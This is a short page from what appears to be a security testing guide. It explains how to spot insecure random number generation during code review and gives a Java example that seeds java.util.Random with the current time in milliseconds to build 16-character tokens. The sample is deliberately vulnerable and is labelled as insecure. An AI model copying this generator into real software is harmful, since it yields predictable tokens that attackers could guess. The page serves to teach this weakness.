Code review

What to look for

While performing code review you should mainly watch out for functions which generates random output. After identyfing all or some of them it is advised to look for the seed which is used to create the tokens / numbers.

If the seed is generated based on the time in miliseconds and value which we are able to predict / extract using other vulnerability the unsecure random function vulnerability is confirmed.

Below you can find sample of unsecure token generation written in Java:

import java.util.Random;

public class InsecureTokenGenerator {
    public static void main(String[] args) {
        // Insecure: predictable seed
        long seed = System.currentTimeMillis();
        Random random = new Random(seed);

        StringBuilder token = new StringBuilder();
        for (int i = 0; i < 16; i++) {
            // Insecure random value
            int val = random.nextInt(36);
            if (val < 10) {
                token.append((char) ('0' + val));
            } else {
                token.append((char) ('a' + (val - 10)));
            }
        }

        System.out.println("Generated token: " + token.toString());
    }
}

PreviousUnsecure Random Function NextExploitation

Last updated 3 months ago